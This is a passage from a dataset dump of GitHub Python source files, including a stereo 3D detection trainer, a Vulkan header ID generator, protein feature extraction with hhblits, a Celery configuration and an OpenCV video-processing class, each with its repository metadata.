bar.finish()\n\n def inference(self):\n # torch.set_grad_enabled(False)\n self.model.eval()\n left_results = {}\n right_results = {}\n dataset = self.test_loader.dataset\n\n with torch.no_grad():\n print(len(self.test_loader))\n progress_bar = tqdm.tqdm(total=len(self.test_loader), leave=True, desc='Evaluation Progress')\n for batch_idx, inputs in enumerate(self.test_loader):\n # load evaluation data and move data to GPU.\n for key, val in inputs.items():\n if not isinstance(val, np.ndarray):\n continue\n if key in ['frame_id', 'metadata', 'calib']:\n continue\n # TODO\n if key in ['left_img', 'right_img']:\n inputs[key] = torch.from_numpy(val).float().cuda()\n # inputs[key] = kornia.image_to_tensor(val).float().cuda()\n elif key in ['image_shape']:\n inputs[key] = torch.from_numpy(val).int().cuda()\n else:\n inputs[key] = torch.from_numpy(val).float().cuda()\n\n pred_dicts= self.model(inputs, False)\n\n dets_l, dets_r = self.process_dets2result(pred_dicts, inputs['frame_id'], inputs['bbox_downsample_ratio'])\n left_results.update(dets_l)\n right_results.update(dets_r)\n\n\n progress_bar.update()\n\n progress_bar.close()\n\n self.save_results(left_results, './left_outputs')\n self.save_results(right_results, './right_outputs')\n\n self.logger.info(\"left image eval epoch{}\".format(self.epoch))\n self.test_loader.dataset.eval(results_dir='./left_outputs/data', logger=self.logger, label_flag='left')\n self.logger.info(\"right image eval epoch{}\".format(self.epoch))\n self.test_loader.dataset.eval(results_dir='./right_outputs/data', logger=self.logger, label_flag='right')\n\n def save_results(self, results, output_dir='./outputs'):\n output_dir = os.path.join(output_dir, 'data')\n if os.path.exists(output_dir):\n shutil.rmtree(output_dir,True)\n os.makedirs(output_dir, exist_ok=True)\n\n for img_id in results.keys():\n output_path = os.path.join(output_dir, '{:06d}.txt'.format(img_id))\n\n f = open(output_path, 'w')\n for i in range(len(results[img_id])):\n class_name = self.class_name[int(results[img_id][i][0])]\n f.write('{} 0.0 0'.format(class_name))\n for j in range(1, len(results[img_id][i])):\n f.write(' {:.2f}'.format(results[img_id][i][j]))\n f.write(' 1.50 1.69 4.33 3.45 2.41 36.08 -1.55 2.45') #TODO remove it\n f.write('\\n')\n f.close()\n\n def process_dets2result(self, outputs, frame_id, bbox_downsample_ratio):\n dets_l, dets_r = extract_dets_from_stereo_outputs(outputs=outputs, K=50)\n dets_l = dets_l.detach().cpu().numpy()\n dets_r = dets_r.detach().cpu().numpy()\n # get corresponding calibs & transform tensor to numpy\n calibs = [self.test_loader.dataset.get_calib(index) for index in frame_id]\n #info = {key: val.detach().cpu().numpy() for key, val in info.items()}\n #cls_mean_size = self.test_loader.dataset.cls_mean_size\n dets_l = decode_detections(dets=dets_l,\n frame_id=frame_id,\n bbox_downsample_ratio=bbox_downsample_ratio,\n calibs=calibs,\n threshold=self.cfg.get('threshold', 0.2))\n dets_r = decode_detections(dets=dets_r,\n frame_id=frame_id,\n bbox_downsample_ratio=bbox_downsample_ratio,\n calibs=calibs,\n threshold=self.cfg.get('threshold', 0.2))\n return dets_l, dets_r\n","repo_name":"czy341181/Stereo3D_codebase","sub_path":"lib/helpers/trainer_helper.py","file_name":"trainer_helper.py","file_ext":"py","file_size_in_byte":10166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32192371718","text":"\nimport os,re,sys\nfrom generator import *\n\n# CGeneratorOptions - subclass of GeneratorOptions.\n#\n# Adds options used by COutputGenerator objects during C language header\n# generation.\n#\n# Additional members\n# prefixText - list of strings to prefix generated header with\n# (usually a copyright statement + calling convention macros).\n# protectFile - True if multiple inclusion protection should be\n# generated (based on the filename) around the entire header.\n# protectFeature - True if #ifndef..#endif protection should be\n# generated around a feature interface in the header file.\n# genFuncPointers - True if function pointer typedefs should be\n# generated\n# protectProto - If conditional protection should be generated\n# around prototype declarations, set to either '#ifdef'\n# to require opt-in (#ifdef protectProtoStr) or '#ifndef'\n# to require opt-out (#ifndef protectProtoStr). Otherwise\n# set to None.\n# protectProtoStr - #ifdef/#ifndef symbol to use around prototype\n# declarations, if protectProto is set\n# apicall - string to use for the function declaration prefix,\n# such as APICALL on Windows.\n# apientry - string to use for the calling convention macro,\n# in typedefs, such as APIENTRY.\n# apientryp - string to use for the calling convention macro\n# in function pointer typedefs, such as APIENTRYP.\n# indentFuncProto - True if prototype declarations should put each\n# parameter on a separate line\n# indentFuncPointer - True if typedefed function pointers should put each\n# parameter on a separate line\n# alignFuncParam - if nonzero and parameters are being put on a\n# separate line, align parameter names at the specified column\nclass IdGeneratorOptions(GeneratorOptions):\n \"\"\"Represents options during C interface generation for headers\"\"\"\n def __init__(self,\n filename = None,\n directory = '.',\n apiname = None,\n profile = None,\n versions = '.*',\n emitversions = '.*',\n defaultExtensions = None,\n addExtensions = None,\n removeExtensions = None,\n emitExtensions = None,\n sortProcedure = regSortFeatures,\n prefixText = \"\",\n genFuncPointers = True,\n protectFile = True,\n protectFeature = True,\n protectProto = None,\n protectProtoStr = None,\n apicall = '',\n apientry = '',\n apientryp = '',\n indentFuncProto = True,\n indentFuncPointer = False,\n alignFuncParam = 0):\n GeneratorOptions.__init__(self, filename, directory, apiname, profile,\n versions, emitversions, defaultExtensions,\n addExtensions, removeExtensions,\n emitExtensions, sortProcedure)\n self.prefixText = prefixText\n self.genFuncPointers = genFuncPointers\n self.protectFile = protectFile\n self.protectFeature = protectFeature\n self.protectProto = protectProto\n self.protectProtoStr = protectProtoStr\n self.apicall = apicall\n self.apientry = apientry\n self.apientryp = apientryp\n self.indentFuncProto = indentFuncProto\n self.indentFuncPointer = indentFuncPointer\n self.alignFuncParam = alignFuncParam\n\n# COutputGenerator - subclass of OutputGenerator.\n# Generates C-language API interfaces.\n#\n# ---- methods ----\n# COutputGenerator(errFile, warnFile, diagFile) - args as for\n# OutputGenerator. Defines additional internal state.\n# ---- methods overriding base class ----\n# beginFile(genOpts)\n# endFile()\n# beginFeature(interface, emit)\n# endFeature()\n# genType(typeinfo,name)\n# genStruct(typeinfo,name)\n# genGroup(groupinfo,name)\n# genEnum(enuminfo, name)\n# genCmd(cmdinfo)\nclass IdOutputGenerator(OutputGenerator):\n \"\"\"Generate specified API interfaces in a specific style, such as a C header\"\"\"\n # This is an ordered list of sections in the header file.\n TYPE_SECTIONS = ['include', 'define', 'basetype', 'handle', 'enum',\n 'group', 'bitmask', 'funcpointer', 'struct']\n ALL_SECTIONS = TYPE_SECTIONS + ['commandPointer', 'command']\n def __init__(self,\n errFile = sys.stderr,\n warnFile = sys.stderr,\n diagFile = sys.stdout):\n OutputGenerator.__init__(self, errFile, warnFile, diagFile)\n # Internal state - accumulators for different inner block text\n self.sections = dict([(section, []) for section in self.ALL_SECTIONS])\n self.apicount = 0\n #\n def beginFile(self, genOpts):\n OutputGenerator.beginFile(self, genOpts)\n # C-specific\n #\n # Multiple inclusion protection & C++ wrappers.\n if (genOpts.protectFile and self.genOpts.filename):\n headerSym = re.sub('\\.h', '_h',\n os.path.basename(self.genOpts.filename)).upper()\n write('#ifndef', headerSym, file=self.outFile)\n write('#define', headerSym, file=self.outFile)\n self.newline()\n #\n # User-supplied prefix text, if any (list of strings)\n if (genOpts.prefixText):\n for s in genOpts.prefixText:\n write(s, file=self.outFile)\n write('enum ApiCallId\\n{', file=self.outFile)\n def endFile(self):\n # C-specific\n # Finish C++ wrapper and multiple inclusion protection\n self.newline()\n write('};', file=self.outFile)\n if (self.genOpts.protectFile and self.genOpts.filename):\n self.newline()\n write('#endif', file=self.outFile)\n # Finish processing in superclass\n OutputGenerator.endFile(self)\n def beginFeature(self, interface, emit):\n # Start processing in superclass\n OutputGenerator.beginFeature(self, interface, emit)\n # C-specific\n # Accumulate includes, defines, types, enums, function pointer typedefs,\n # end function prototypes separately for this feature. They're only\n # printed in endFeature().\n self.sections = dict([(section, []) for section in self.ALL_SECTIONS])\n def endFeature(self):\n # C-specific\n # Actually write the interface to the output file.\n if (self.emit):\n if (self.sections['command']):\n write('\\n'.join(self.sections['command']), end='', file=self.outFile)\n self.newline()\n # Finish processing in superclass\n OutputGenerator.endFeature(self)\n #\n # Append a definition to the specified section\n def appendSection(self, section, text):\n # self.sections[section].append('SECTION: ' + section + '\\n')\n self.sections[section].append(text)\n #\n # Type generation\n def genType(self, typeinfo, name, alias):\n OutputGenerator.genType(self, typeinfo, name, alias)\n #\n # Struct (e.g. C \"struct\" type) generation.\n # This is a special case of the tag where the contents are\n # interpreted as a set of tags instead of freeform C\n # C type declarations. The tags are just like \n # tags - they are a declaration of a struct or union member.\n # Only simple member declarations are supported (no nested\n # structs etc.)\n def genStruct(self, typeinfo, typeName, alias):\n OutputGenerator.genStruct(self, typeinfo, typeName, alias)\n #\n # Group (e.g. C \"enum\" type) generation.\n # These are concatenated together with other types.\n def genGroup(self, groupinfo, groupName, alias):\n OutputGenerator.genGroup(self, groupinfo, groupName, alias)\n # Enumerant generation\n # tags may specify their values in several ways, but are usually\n # just integers.\n def genEnum(self, enuminfo, name, alias):\n OutputGenerator.genEnum(self, enuminfo, name, alias)\n #\n # Command generation\n def genCmd(self, cmdinfo, name, alias):\n OutputGenerator.genCmd(self, cmdinfo, name, alias)\n tokenname = ' ApiCallId_' + name\n align = 100 - len(tokenname)\n self.appendSection('command', '{}{}= 0x1{:03x},'.format(tokenname, (' ' * align), self.apicount))\n self.apicount += 1\n","repo_name":"Refael10ru/VK_TEST","sub_path":"1.2.148.1/source/gfxreconstruct/framework/generated/idgenerator.py","file_name":"idgenerator.py","file_ext":"py","file_size_in_byte":8437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"35979644172","text":"# -*-coding:Latin-1 -*\n\n\ndef table(nb, max=10):\n \"\"\"Fonction qui calcule des tables de multiplication\n de nb de 0 jusqu'à max\"\"\"\n i = 0\n while i <= max:\n print(nb, \" *\", i, \" = \", nb * i)\n i += 1\n","repo_name":"smilereptile/python","sub_path":"PycharmProjects/getting_started/packages/fonctions.py","file_name":"fonctions.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40227982749","text":"import os\r\nimport re\r\nimport numpy as np\r\n\r\ndef read_data_file_trip(filename):\r\n f = open(filename)\r\n data = f.readlines()\r\n f.close()\r\n\r\n results=[]\r\n block=len(data)//2\r\n for index in range(block):\r\n item1=data[index*2+0].split()\r\n name =item1[0].strip()\r\n seq=item1[1].strip()\r\n item2 = data[index * 2 + 1].split() #label\r\n item = []\r\n item.append(name)\r\n item.append(seq)\r\n results.append(item)\r\n return results\r\n\r\ndef extratdataa3m_hmm(file,desta3mfolder,desthmmfolder):\r\n student_tuples = read_data_file_trip(file)\r\n acid20 = 'ARNDCQEGHILKMFPSTWYV'\r\n for name, seq in student_tuples:\r\n with open(os.path.join(desta3mfolder, 'tmphhm.seq'), 'w') as f:\r\n f.write('>'+name+'\\n'+seq)\r\n f.close()\r\n cmd = 'hhblits -i '\r\n cmd += os.path.join(desta3mfolder, 'tmphhm.seq')\r\n cmd+=' -oa3m '\r\n cmd+= os.path.join(desta3mfolder, name+'.a3m ')\r\n cmd += ' -ohhm '\r\n cmd += os.path.join(desthmmfolder, name + '.hhm')\r\n cmd+=' -n 3 -cpu 30 -d /home/dell/Documents/UniRef30_2022_02_hhsuite/UniRef30_2022_02'\r\n os.system(cmd)\r\n\r\n\r\nif __name__ == '__main__':\r\n print('----prepare dataset------')\r\n\r\n extratdataa3m_hmm('../DataSet/atp-17-for-227.txt',\r\n '../DataSet/hhdataseta3m/',\r\n '../DataSet/hhdatasethhm/')\r\n\r\n extratdataa3m_hmm('../DataSet/atp-41-for-388.txt',\r\n '../DataSet/hhdataseta3m/',\r\n '../DataSet/hhdatasethhm/')\r\n\r\n extratdataa3m_hmm('../DataSet/atp-227.txt',\r\n '../DataSet/hhdataseta3m/',\r\n '../DataSet/hhdatasethhm/')\r\n\r\n extratdataa3m_hmm('../DataSet/atp-388.txt',\r\n '../DataSet/hhdataseta3m/',\r\n '../DataSet/hhdatasethhm/')\r\n\r\n extratdataa3m_hmm('../DataSet/atp-549.txt',\r\n '../DataSet/hhdataseta3m/',\r\n '../DataSet/hhdatasethhm/')\r\n print('----finish-------')\r\n\r\n","repo_name":"jerry1984Y/ATP-Deep","sub_path":"feature_extract/extract_hhm.py","file_name":"extract_hhm.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30545803823","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\nimg = cv.imread(\"1.jpg\")\n\nrows,cols = img.shape[:2]\nimg1 = np.float32([[50,50],[200,50],[50,200]])\nimg2 = np.float32([[100,100],[200,50],[100,250]])\n\nM = cv.getAffineTransform(img1,img2)\n\nimg3 = cv.warpAffine(img,M,(cols,rows))\nplt.imshow(img[:,:,::-1])\nplt.show()","repo_name":"123-YUYUYU/opencv","sub_path":"1/9、仿射变换.py","file_name":"9、仿射变换.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2117918792","text":"from pecan import make_app\nfrom pecan.hooks import PecanHook\n\nfrom urbane.utils import Config\n\nimport traceback\n\n# helpers\ndef setup_app(config):\n\n # setup defaults\n if not hasattr(config, 'date_format'):\n setattr(config, 'date_format', '%Y-%m-%d')\n if not hasattr( config, 'time_format'):\n setatttr(config, 'time_format', '%H:%M:%S')\n if not hasattr(config, 'datetime_format'):\n setattr(config, 'datetime_format', '%s %s' % (config['date_format'], config['time_format']))\n\n conf = Config()\n conf.read(config['conf_file'])\n\n config.update(conf.as_dict())\n\n app_conf = dict(config.app)\n\n return make_app(\n app_conf.pop('root'),\n logging=getattr(config, 'logging', {}),\n **app_conf\n )\n","repo_name":"sreenathmenon/urbane-project-bkps","sub_path":"urbane/urbane/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24539391586","text":"from typing import Any, Dict, Type, TypeVar\n\nimport attr\n\nT = TypeVar(\"T\", bound=\"EngineConfig\")\n\n\n@attr.s(auto_attribs=True)\nclass EngineConfig:\n \"\"\"\n Attributes:\n name (str):\n type (str):\n \"\"\"\n\n name: str\n type: str\n\n def to_dict(self) -> Dict[str, Any]:\n name = self.name\n type = self.type\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(\n {\n \"name\": name,\n \"type\": type,\n }\n )\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n name = d.pop(\"name\")\n\n type = d.pop(\"type\")\n\n engine_config = cls(\n name=name,\n type=type,\n )\n\n return engine_config\n","repo_name":"kairntech/sherpa-client","sub_path":"sherpa_client/models/engine_config.py","file_name":"engine_config.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38369391813","text":"import parameter\nfrom celery_app.redis_connection import redis_backend\n\n# Configure the broker URI\nbroker_url = \"amqp://{}:{}@{}:5672/{}\".format(\n parameter.get_env(\"CELERY_BROKER_USER\"),\n parameter.get_env(\"CELERY_BROKER_PASSWORD\"),\n parameter.get_env(\"CELERY_BROKER_HOST\"),\n parameter.get_env(\"CELERY_BROKER_VHOST\"),\n)\n\n# Configure result backend\nresult_backend = \"redis://{}:{}/{}\".format(\n parameter.get_env(\"REDIS_HOST\"),\n parameter.get_env(\"REDIS_PORT\"),\n redis_backend.connection_pool.connection_kwargs.get(\"db\"),\n)\n# result_backend = 'cassandra'\n# cassandra_servers = ['localhost']\n# cassandra_auth_kwargs = {\n# 'username': parameter.get_env('CASSANDRA_USER'),\n# 'password': parameter.get_env('CASSANDRA_PASS')\n# }\n# cassandra_keyspace = 'celery'\n# cassandra_table = 'tasks'\n# cassandra_read_consistency = 'ONE'\n# cassandra_write_consistency = 'ONE'\n# cassandra_entry_ttl = 86400\n\n# Force celery to just acknowledge the task after it is executed\ntask_acks_late = True\n\naccept_content = [\"json\", \"pickle\"]\n\ntask_serializer = \"pickle\"\n\nresult_serializer = \"pickle\"\n\nworker_prefetch_multiplier = 1\n\nworker_log_format = \"%(asctime)s - %(levelname)s %(processName)s: %(message)s\"\nworker_task_log_format = \"%(asctime)s - %(levelname)s %(processName)s: %(task_name)s[%(task_id)s]: %(message)s\"\n\ntask_send_sent_event = True\n","repo_name":"mfurquimdev/learning_celery","sub_path":"celery_app/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73248330702","text":"from tree_node import TreeNode\n\n\ndef traverse(root):\n if not root:\n return\n\n print(f\"At node {root}\")\n\n print(f\"Entering node {root.left} from {root}\")\n traverse(root.left)\n print(f\"Leaving node {root.left} from {root}\")\n\n print(f\"Entering node {root.right} from {root}\")\n traverse(root.right)\n print(f\"Leaving node {root.right} from {root}\")\n return\n\n\nif __name__ == \"__main__\":\n root = TreeNode(3, TreeNode(9), TreeNode(20, TreeNode(15), TreeNode(7)))\n traverse(root)\n\n","repo_name":"lexiewangdl/pyalgo","sub_path":"binary_tree/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"20184620595","text":"from functools import cached_property\nfrom typing import Dict, Tuple, Union\nfrom collections import deque\nfrom datetime import datetime\nimport itertools\nimport math\nimport time\nimport os\n\nfrom rich import print\nfrom tqdm import tqdm\nimport numpy as np\nimport cv2\n\nfrom src.modules.utils import tuple_handler\nfrom . import Backbone\n\n\nclass Video:\n def __init__(\n self,\n path: str,\n speed: int = 1,\n delay: int = 1,\n subsampling: int = 1,\n sync: bool = True,\n resolution: Tuple = None,\n progress_bar: bool = True,\n show_fps: Union[Dict, bool] = None,\n record: Union[Dict, bool] = None,\n ) -> None:\n \"\"\"\n Initializes a Video object.\n\n Args:\n path (str): Path of the video to open.\n speed (int, optional): Playback speed of the video. Defaults to 1.\n delay (int, optional): Delay between frames in milliseconds. Defaults to 1.\n subsampling (int, optional): Skip frames during processing. Defaults to 1.\n sync (bool, optional): Synchronize video playback and frame processing. Defaults to True.\n resolution (Tuple, optional): Change resolution of the video. Defaults to None.\n progress_bar (bool, optional): Display progress bar during video playback. Defaults to True.\n show_fps (Dict or bool, optional): Display video real-time FPS. Default to None.\n record (Dict or bool, optional): Record the video. Default to None.\n\n Raises:\n FileExistsError: If the file is not found.\n \"\"\"\n if not os.path.exists(path):\n raise FileExistsError(\n \"File not found. Check again or use an absolute path.\"\n )\n self.path = str(path)\n self.video_capture = cv2.VideoCapture(path)\n self.is_camera = bool(self.total_frame == -1)\n self.__check_speed(speed)\n self.wait = int(delay)\n self.subsampling = max(1, int(subsampling))\n self.sync = bool(sync)\n self.resolution = tuple_handler(resolution, max_dim=2) if resolution else None\n self.__setup_progress_bar(show=progress_bar)\n self.__setup_fps_display(config=show_fps)\n self.__setup_recorder(config=record)\n\n def __check_speed(self, value: Union[int, float]) -> None:\n \"\"\"\n Check and setup speed parameter.\n\n Args:\n value (Union[int, float]): Speed value to check.\n \"\"\"\n if self.is_camera:\n self.speed = 1\n else:\n self.speed = int(max(1, value))\n if isinstance(value, float):\n self.speed_mul = value / self.speed\n\n def __setup_progress_bar(self, show: bool) -> None:\n \"\"\"\n Initializes and sets up a progress bar using tqdm.\n\n Args:\n show (bool): Flag to determine whether to show the progress bar.\n \"\"\"\n self.progress = tqdm(\n disable=not show,\n total=self.total_frame,\n desc=f\" {self.name}\",\n unit=\" frame\",\n smoothing=0.3,\n delay=0.1,\n colour=\"cyan\",\n )\n\n def __setup_fps_display(self, config: Union[Dict, bool]) -> None:\n \"\"\"\n Setup for display video FPS\n\n Args:\n config (Dict or bool): Configuration or `True` for default\n \"\"\"\n if config not in [False, None]:\n self.fps_history = deque(maxlen=config.get(\"smoothness\", 30))\n self.fps_pos = tuple_handler(config.get(\"position\", (20, 40)), max_dim=2)\n\n def __setup_recorder(self, config: Union[Dict, bool]) -> None:\n \"\"\"\n Setup for record the video.\n\n Args:\n config (Dict or bool): A dictionary of configurations. False for disable.\n \"\"\"\n\n # Disable if config is not provided\n if not config:\n return\n\n # Set save folder\n save_folder = os.path.join(\n config[\"path\"],\n datetime.now().strftime(\"%d-%m-%Y\") if self.is_camera else self.stem,\n )\n\n # Create save folder\n if not os.path.exists(save_folder):\n os.makedirs(save_folder, exist_ok=True)\n\n # Config writer\n save_path = os.path.join(save_folder, config[\"name\"] + \".mp4\")\n\n codec = cv2.VideoWriter_fourcc(*\"mp4v\")\n\n fps = float(config[\"fps\"] if config[\"fps\"] else self.fps)\n\n self.recorder_res = (\n tuple_handler(config[\"resolution\"], max_dim=2)\n if config[\"resolution\"]\n else self.size()\n )\n\n # Config writer\n self.recorder = cv2.VideoWriter(\n filename=save_path, fourcc=codec, fps=fps, frameSize=self.recorder_res\n )\n\n # Logging\n print(f\"[INFO] [bold]Save recorded video to:[/] [green]{save_path}[/]\")\n\n def __resync(func):\n \"\"\"Synchronize video speed with fps\"\"\"\n\n # Create wrapper function\n def wrapper(self):\n # Check on first run\n if not hasattr(self, \"start_time\"):\n self.start_time = time.time()\n\n # Run the function\n output = func(self)\n\n # Get delay time\n delay = time.time() - self.start_time\n\n # Check if sync is enable\n if self.sync:\n # Calculate sync value\n sync_time = (\n 1 / self.fps / (self.speed_mul if hasattr(self, \"speed_mul\") else 1)\n )\n # Apply sync if needed\n if delay < sync_time:\n time.sleep(sync_time - delay)\n\n # Display fps if specified\n if hasattr(self, \"fps_history\"):\n self.fps_history.append(math.ceil(1 / (time.time() - self.start_time)))\n self.add_text(\n text=f\"FPS: {math.ceil(np.mean(self.fps_history))}\",\n pos=self.fps_pos,\n thickness=2,\n )\n\n # Setup for new circle\n self.start_time = time.time()\n\n # Return function output\n return output\n\n return wrapper\n\n def __iter__(self) -> \"Video\":\n \"\"\"\n Initialize video iteration.\n\n Returns:\n Video: The video object.\n \"\"\"\n\n # Video iteration generate\n def generate():\n for _, frame in iter(self.video_capture.read, (False, None)):\n yield frame\n\n # Generate frame queue\n self.queue = itertools.islice(generate(), 0, None, self.speed)\n\n # Initialize\n self.pause = False\n\n # print(\"[bold]Video progress:[/]\")\n\n return self\n\n @__resync\n def __next__(self) -> Union[cv2.Mat, np.ndarray]:\n \"\"\"\n Get the next frame from the video.\n\n Returns:\n MatLike: The next frame.\n \"\"\"\n\n # Get current frame\n self.current_frame = next(self.queue)\n\n # Change video resolution\n if self.resolution:\n self.current_frame = cv2.resize(self.current_frame, self.resolution)\n\n # Backbone process\n if hasattr(self, \"backbone\"):\n # Check subsampling\n if (self.progress.n % self.subsampling) == 0:\n # Process the current frame\n self.backbone.process(self.current_frame)\n\n # Apply to current frame\n self.current_frame = self.backbone.apply(self.current_frame)\n\n # Recorder the video\n if hasattr(self, \"recorder\"):\n self.recorder.write(\n cv2.resize(self.current_frame, self.recorder_res)\n if self.recorder_res\n else self.current_frame\n )\n\n # Update progress\n self.progress.update(\n max(1, min(self.speed, self.total_frame - self.progress.n))\n )\n\n # Return current frame\n return self.current_frame\n\n def __len__(self) -> int:\n \"\"\"\n Get the total number of frames in the video.\n\n Returns:\n int: Total number of frames.\n \"\"\"\n return int(self.video_capture.get(cv2.CAP_PROP_FRAME_COUNT))\n\n @cached_property\n def name(self) -> str:\n \"\"\"\n Return name of the video\n\n Returns:\n str: name of the video\n \"\"\"\n return self.path.split(\"/\")[-1]\n\n @cached_property\n def stem(self) -> str:\n \"\"\"\n Return name of the video without extension\n\n Returns:\n str: name of the video without extension\n \"\"\"\n return self.name.split(\".\")[0]\n\n @cached_property\n def cap(self) -> cv2.VideoCapture:\n \"\"\"\n Return video capture\n\n Returns:\n VideoCapture\n \"\"\"\n return self.video_capture\n\n @cached_property\n def total_frame(self) -> int:\n \"\"\"\n Return total number of frame\n\n Returns:\n int: total frame\n \"\"\"\n return int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n @cached_property\n def fps(self) -> int:\n \"\"\"\n Return FPS of the video\n\n Returns:\n int: FPS of the video\n \"\"\"\n return int(self.cap.get(cv2.CAP_PROP_FPS))\n\n @cached_property\n def shortcuts(self) -> Dict:\n \"\"\"\n Return shortcut of the video\n\n Returns:\n Dict: Shortcut of the video\n \"\"\"\n return {\n \"quit\": \"q\",\n \"pause\": \"p\",\n \"resume\": \"r\",\n \"detector\": \"1\",\n \"classifier\": \"2\",\n \"heatmap\": \"3\",\n \"track_box\": \"4\",\n }\n\n def setup_backbone(self, config: Dict) -> None:\n \"\"\"\n Initializes and sets up backbone for video process.\n\n Args:\n config (Dict): Configuration for the backbone\n \"\"\"\n self.backbone = Backbone(\n video=self, process_config=config, **config[\"backbone\"]\n )\n\n def custom_shortcut(self, values: Dict):\n \"\"\"\n Updates the existing shortcuts dictionary with the provided new_shortcuts.\n\n Args:\n new_shortcuts (Dict): Dictionary containing shortcut name-key pairs.\n \"\"\"\n self.shortcuts.update(\n {name: key for name, key in values.items() if name in self.shortcuts}\n )\n\n def size(self, reverse: bool = False) -> Tuple[int, int]:\n \"\"\"\n Return video size\n\n Args:\n reverse (bool): reverse output. Defaults to (Width, Height)\n\n Returns:\n Tuple: size of the video\n \"\"\"\n w, h = (\n int(self.cap.get(prop))\n for prop in [cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT]\n )\n return (w, h) if not reverse else (h, w)\n\n def add_box(\n self,\n top_left: Tuple,\n bottom_right: Tuple,\n color: Tuple = (255, 255, 255),\n thickness: int = 1,\n ) -> None:\n \"\"\"\n Add a rectangle to the current frame.\n\n Args:\n top_left (Tuple): Top-left corner coordinates (x, y).\n bottom_right (Tuple): Bottom-right corner coordinates (x, y).\n color (Tuple, optional): Color of the rectangle (B, G, R). Defaults to (255, 255, 255).\n thickness (int, optional): Thickness of the rectangle outline. Defaults to 1.\n\n Returns:\n None\n \"\"\"\n cv2.rectangle(\n img=self.current_frame,\n pt1=tuple_handler(top_left, max_dim=2),\n pt2=tuple_handler(bottom_right, max_dim=2),\n color=tuple_handler(color, max_dim=3),\n thickness=int(thickness),\n )\n\n def add_circle(\n self,\n center: Tuple,\n radius: int,\n color: Tuple = (255, 255, 255),\n thickness: int = 1,\n ) -> None:\n \"\"\"\n Add a circle to the current frame.\n\n Args:\n center (Tuple): Center coordinates (x, y).\n radius (int): Circle radius.\n color (Tuple, optional): Color of the circle (B, G, R). Defaults to (255, 255, 255).\n thickness (int, optional): Thickness of the circle outline. Defaults to 1.\n\n Returns:\n None\n \"\"\"\n cv2.circle(\n img=self.current_frame,\n center=tuple_handler(center, max_dim=2),\n radius=int(radius),\n color=tuple_handler(color, max_dim=3),\n thickness=int(thickness),\n )\n\n def add_point(\n self, center: Tuple, radius: int, color: Tuple = (255, 255, 255)\n ) -> None:\n \"\"\"\n Add a point to the current frame.\n\n Args:\n center (Tuple): Center coordinates (x, y).\n radius (int): Circle radius.\n color (Tuple, optional): Color of the point (B, G, R). Defaults to (255, 255, 255).\n\n Returns:\n None\n \"\"\"\n cv2.circle(\n img=self.current_frame,\n center=tuple_handler(center, max_dim=2),\n radius=int(radius),\n color=tuple_handler(color, max_dim=3),\n thickness=-1,\n )\n\n def add_text(\n self,\n text: str,\n pos: Tuple,\n font_scale: int = 1,\n color: Tuple = (255, 255, 255),\n thickness: int = 1,\n ) -> None:\n \"\"\"\n Add text to the current frame.\n\n Args:\n text (str): Text to add.\n pos (Tuple): Position coordinates (x, y).\n font_scale (int, optional): Font scale for the text. Defaults to 1.\n color (Tuple, optional): Color of the text (B, G, R). Defaults to (255, 255, 255).\n thickness (int, optional): Thickness of the text. Defaults to 1.\n\n Returns:\n None\n \"\"\"\n cv2.putText(\n img=self.current_frame,\n text=str(text),\n org=tuple_handler(pos, max_dim=2),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=int(font_scale),\n color=tuple_handler(color, max_dim=3),\n thickness=int(thickness),\n )\n\n def show(self) -> None:\n \"\"\"Show the frame\"\"\"\n if not hasattr(self, \"current_frame\"):\n raise ValueError(\n \"No current frame to show. Please run or loop through the video first.\"\n )\n cv2.imshow(self.stem, self.current_frame)\n\n def run(self) -> None:\n \"\"\"Runs the video playback loop\"\"\"\n for _ in self:\n self.show()\n\n if not self.delay(self.wait):\n break\n\n self.release()\n\n def delay(self, value: int) -> bool:\n \"\"\"\n Video delay\n\n Args:\n value (int): millisecond\n\n Returns:\n bool: True if continue else False\n \"\"\"\n key = cv2.waitKey(value if not self.pause else 0) & 0xFF\n\n # Check pause status\n self.pause = (\n True\n if key == ord(self.shortcuts[\"pause\"])\n else False\n if key == ord(self.shortcuts[\"resume\"])\n else self.pause\n )\n\n # Check features toggle\n if hasattr(self, \"backbone\"):\n for process in self.backbone.status:\n if process != \"human_count\" and key == ord(self.shortcuts[process]):\n self.backbone.status[process] = not self.backbone.status[process]\n\n # Check continue\n return True if not key == ord(\"q\") else False\n\n def release(self) -> None:\n \"\"\"Release capture\"\"\"\n self.video_capture.release()\n if hasattr(self, \"recorder\"):\n self.recorder.release()\n if hasattr(self, \"backbone\"):\n self.backbone.finish()\n cv2.destroyWindow(self.stem)\n","repo_name":"HT0710/Human-Activity-Recognition","sub_path":"src/components/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":15674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73760457423","text":"import torch\nimport 